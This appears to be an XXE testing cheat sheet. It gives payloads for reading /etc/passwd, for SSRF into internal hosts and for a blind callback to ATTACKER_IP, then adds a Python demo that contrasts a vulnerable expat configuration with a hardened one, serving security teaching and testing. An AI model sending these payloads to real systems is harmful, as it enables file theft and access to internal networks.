XML EXTERNAL ENTITY (XXE)
Test for XXE
Submit wherever the server parses XML you control: API request bodies, SOAP envelopes, file uploads that are XML or zip-wrapped XML (SVG, DOCX, XLSX). The entity must be referenced (&xxe;) inside an element the response echoes; if the parser has external entities disabled, the reference is silently dropped or rejected, which is a negative result, not an error
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
Example Output
Submit XML:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
Response includes:
root:x:0:0:root:/root:/bin/bash
(XXE CONFIRMED - can read files)
XXE to read files
Read local files: arbitrary file disclosure through the XML parser (not LFI in the include-and-execute sense). Only files that are valid XML text come back cleanly; binary files or files containing < or & break the parse
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Example Output
Submit:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>&xxe;</user>
Response:
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:...
(File read via XXE)
XXE SSRF
Access internal services the application server can reach (loopback admin ports, other hosts on its network). The fetched body is only echoed if it parses as XML text; a non-XML response causes a parse error, so watch for error messages and timing differences, or fall back to the blind technique
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-host/">]>
Example Output
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://172.16.1.10:8080/">]>
<root>&xxe;</root>
Response includes internal page content
(Access internal services through XXE)
Blind XXE (out-of-band)
Confirm with an HTTP callback to a listener you control when the response echoes nothing. Declaring the entity alone does nothing: it must still be referenced in the body for the parser to fetch it
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://ATTACKER_IP:8000/xxe">]>
Example Output
Submit:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://ATTACKER_IP:8000/gotcha">]>
<root>&xxe;</root>
Attacker HTTP server (e.g. python3 -m http.server 8000) logs:
10.10.10.5 - - "GET /gotcha HTTP/1.1" 200 -
(Confirms XXE even with no visible output; the request comes from the vulnerable server's IP, so it also proves the server has outbound HTTP egress to you)
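Added example, not from the original page: the file-read and blind-callback payloads above run against a stand-in for the vulnerable application, Python's stdlib xml.sax (expat) parser with external entity resolution switched on, next to the safe default and a wrapper that refuses any DTD. The secret file, the loopback listener and every function name here are constructed for this demo; the same SYSTEM fetch is what makes the SSRF variant work.

```python
import io
import re
import tempfile
import threading
import xml.sax
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from pathlib import Path
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Gathers character data so we can see exactly what the parser expanded."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    @property
    def text(self):
        return "".join(self.chunks)


def parse_xml(xml_bytes, resolve_external_entities):
    """Parse with the stdlib SAX/expat parser.

    resolve_external_entities=True re-enables SYSTEM entity fetching, mimicking a
    legacy or misconfigured parser. False is the stdlib default (since 3.7.1) and
    is the fix: the &xxe; reference is skipped instead of fetched.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text


def parse_xml_hardened(xml_bytes):
    """Defense in depth for untrusted input: refuse any document carrying a DTD
    (a simple pre-scan; the DOCTYPE keyword is case-sensitive in XML), then parse
    with external entities disabled."""
    if re.search(rb"<!DOCTYPE", xml_bytes):
        raise ValueError("DTD/DOCTYPE not allowed in untrusted XML")
    return parse_xml(xml_bytes, resolve_external_entities=False)


def file_read_demo():
    """XXE file read against a constructed secret file standing in for /etc/passwd."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed sample content
        secret_path = Path(f.name)
    payload = (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "' + secret_path.as_uri().encode() + b'">]>\n'
        b"<root>&xxe;</root>"
    )
    try:
        return {
            "vulnerable": parse_xml(payload, resolve_external_entities=True),
            "default": parse_xml(payload, resolve_external_entities=False),
        }
    finally:
        secret_path.unlink()


class _CallbackHandler(BaseHTTPRequestHandler):
    """Stand-in for the attacker's listener; records every path requested."""
    hits = []

    def do_GET(self):
        self.hits.append(self.path)
        body = b"pong"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def blind_oob_demo():
    """Blind XXE: the parser's SYSTEM fetch lands on the listener even when the
    application would echo nothing. Listener is a loopback HTTP server here."""
    _CallbackHandler.hits.clear()
    server = ThreadingHTTPServer(("127.0.0.1", 0), _CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    port = server.server_address[1]
    payload = (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1:%d/gotcha">]>\n' % port
        + b"<root>&xxe;</root>"
    )
    try:
        echoed = parse_xml(payload, resolve_external_entities=True)
    finally:
        server.shutdown()
        server.server_close()
    return {"hits": list(_CallbackHandler.hits), "echoed": echoed}


if __name__ == "__main__":
    print(file_read_demo())
    print(blind_oob_demo())
```

Running it stand-alone prints the leaked file content under "vulnerable" and an empty string under "default", then the listener's recorded GET /gotcha. The wrapper that rejects DOCTYPE is the cheap check to add in front of any parser whose entity settings you cannot audit.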